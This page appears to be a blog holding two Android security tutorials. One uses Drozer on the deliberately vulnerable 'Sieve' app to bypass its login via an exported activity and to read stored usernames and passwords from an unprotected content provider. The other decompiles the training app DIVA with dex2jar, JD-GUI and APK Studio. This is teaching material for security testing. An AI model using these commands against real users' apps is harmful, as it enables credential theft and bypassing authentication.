Quick Demo on Performing Dynamic Analysis for Android App

Quick Demo on Performing Dynamic Analysis for Android App

Advertisements

Drozer is a comprehensive security audit and attack framework for Android, which is friendly to perform dynamic analysis on Android app.

Two prerequisites for performing this quick demo:

  • Kali Linux
  • A rooted Android device (It could be Android Virtual Device – AVD, but physical Android device is used in this demo)

Installing the Drozer Console into Kali

  1. (Skip this step, if adb has been installed already) Install ADB tool

    sudo apt-get install android-tools-adb

  2. Install Drozer’s dependencies

    wget https://pypi.python.org/packages/25/5d/cc55d39ac39383dd6e04ae80501b9af3cc455be64740ad68a4e12ec81b00/setuptools-0.6c11-py2.7.egg#md5=fe1f997bc722265116870bc7919059ea

    (It you can’t use wget to get the file, please go to https://pypi.python.org/pypi/setuptools/0.6c11 to download the file “setuptools-0.6c11-py2.7.egg” via browser)
    20170628-01

    sh setuptools-0.6c11-py2.7.egg

    easy_install –allow-hosts pypi.python.org protobuf

    easy_install twisted==10.2.0

    20170628-02

  3. Install Drozer

    wget https://github.com/mwrlabs/drozer/releases/download/2.4.2/drozer-2.4.2-py2.7.egg

    easy_install ./drozer-2.4.2-py2.7.egg

    20170628-03

  4. Test the installation

    drozer

    20170628-04
    The above screen indicates the success of the console installation.

Installing the Drozer Agent into rooted Android device

  1. Make sure your rooted Android device has “Developer options” enabled with the following settings:
    Root access: Apps and ADB
    Android debugging: On
    ADB over network: On {ADB over USB could be used as well, but for some situations, some Android device vendor ID is not recognized by ADB tool. ADB over network could prevent this kind of connection issue.}20170628-05
  2. In Kali Linux, try to make a ADB connection to the rooted Android device

    adb connect 192.168.137.219

    20170628-05

    During establishing the ADB connection, please authorize it from your rooted Android device
    20170628-07

    Verify the ADB connection afterwards

    adb devices

    20170628-08

  3. Deploy the Drozer agent to the rooted Android device

    adb install agent.apk

    20170628-09

    20170628-10

Establish Drozer Session

  1. In Kali, port forward to a TCP socket opened by the Drozer Agent

    adb forward tcp:31415 tcp:31415

    20170628-10

  2. Launch the Drozer agent in the rooted Android device and select the “Embedded Server” option and tap “Enable” to start the server
    20170628-11
  3. Connect the console to the agent

    drozer console connect

    20170628-11

Basic Usage Demo

  1. (Skip this step, if target app is already in place) Install a dummy app named “Sieve” (Password Manager), which showcase some common Android vulnerabilities

    wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk

    adb install sieve.apk

    20170628-12
    20170628-13
    20170628-19
    Let’s play with the newly installed “Sieve” and enter some dummy information for testing.

  2. Find the identifier for “Sieve”

    run app.package.list -f sieve

    20170628-13

  3. Check the basic package information about “Sieve”

    run app.package.info -a com.mwr.example.sieve

    20170628-14

  4. Identify the Attack Surface of “Sieve”

    run app.package.attacksurface com.mwr.example.sieve

    20170628-15
    Attack Surface means those interfaces could be accessible (i.e. exported) to other apps:
    activities -> screens used by the app
    content providers -> database objects of the app
    services -> background tasks (Besides, the service of “Sieve” is debuggable, which means that a debugger could be attached to the process)

  5. Gather more information on activities

    run app.activity.info -a com.mwr.example.sieve

    20170628-16
    Since activities is exported and does not require any permission, let’s try to launch to launch the activity “com.mwr.example.sieve.PWList”

    run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWList

    20170628-17
    20170628-22
    The authentication of “Sieve” has been successfully bypassed!

  6. Gather more information on content providers (i.e. database objects)

    run app.provider.info -a com.mwr.example.sieve

    20170628-20
    It confirms that these content providers do not require any particular permission to interact with them, except for the path “/Keys” in the “DBContentProvider”.

    As the content provider is named “DBContentProvider”, it may indicate some form of database could be located in its backend. The URIs to access the DBContentProvider needed to be identified.

    run scanner.provider.finduris -a com.mwr.example.sieve

    20170628-21
    Let’s retrieve information from those accessible URIs.

    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

    20170628-22
    A list of usernames, password (Base64-encoded) and email from “Sieve” could be retrieved.

Conclusion

  • Drozer is user friendly and easy to identify potential vulnerabilities in Android app
  • This demo only covers part of the features of Drozer, please explore more on your own. You could even customized your own module for Drozer to perform your own checking

 

Thanks for reading!

Best regards
Henry

Quick Demo on Reverse Engineering Android App

Quick Demo on Reverse Engineering Android App

For demo, debug version of DIVA (Damn insecure and vulnerable App) is used as the target Android App and Kali Linux is used as the tooling platform.

Download debug version of DIVA

  1. Visit the DIVA download page at DIVA download page and go to the section “Where can I get Diva?
    20170627-01
  2. Capture the download link and download the file by wget.

    wget http://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz

    Then, extract “diva-beta.tar.gz”

    tar xvzf diva-beta.tar.gz

    20170627-02

What is APK?

  1. Android Package Kit (APK) is the package file format used by the Android operating system for distribution and installation of mobile apps and middleware. It is a type of archive file, specifically in zip format packages.
    20170627-03
  2. But, the containing files can’t be just simply unzipped to obtain their original forms.
  3. classes.dex is the Dalvik (virtual machine in Google’s Android operating system) Bytecode of the APK file. dex2jar could be used to convert Dalvik Bytecode (DEX) to Java Bytecode (JAR). JD-GUI could be used to display Java source codes with a friendly GUI.
  4. apktool could be used to decode resources (e.g. xml files) within APK file to nearly original forms.
    20170627-04
    But, for ease of reverse-engineering (decompiling/editing) & recompiling of android application binaries within a single user-interface, APK Studio will be used. It is a cross-platform IDE with a friendly IDE like layout, with a code editor which supports syntax highlighting for Android SMALI (*.smali) code files.

Convert the APK into Java source code for detail review

  1. Extract the classes.dex from APK

    unzip diva-beta.apk classes.dex

    20170627-05

  2. Convert Dalvik Bytecode (DEX) into Java Bytecode (JAR)

    d2j-dex2jar classes.dex

    20170627-06

  3. (Skip this step, if JD-GUI has been installed already) Download JD-GUI installation package and install it

    wget https://github.com/java-decompiler/jd-gui/releases/download/v1.4.0/jd-gui_1.4.0-0_all.deb

    dpkg -i jd-gui_1.4.0-0_all.deb

    20170627-07

  4. Open classes-dex2jar.jar by JD-GUI

    java -jar /opt/jd-gui/jd-gui.jar /root/classes-dex2jar.jar

    20170627-08

Decode APK resources and SMALI code editing (decompile -> edit -> recompile)

  1. (Skip this step, if APK Studio has been installed already)
    Install the android adb

    sudo apt-get install android-tools-adb

    Download the source of APK Studio from APK studio official website
    20170627-10
    Change the download executable “apkstudio-d49d3de-linux.run” and run

    chmod +x apkstudio-d49d3de-linux.run

    ./apkstudio-d49d3de-linux.run

    20170627-11
    20170627-12
    20170627-13

  2. Open APK Studio and open the APK file

    /opt/apkstudio/apkstudio

    20170627-14

  3. Review and edit the XML and SMALI code
    20170627-15
    (Sign and export APK will not be discussed here, that should be simple.)

Conclusion

  • Converted Java source code is good for understanding the detail program structure (assume code obfuscation is not implemented)
  • SMALI code is good for quick edit (by making reference to Java source code)

Thanks for reading!

Best regards
Henry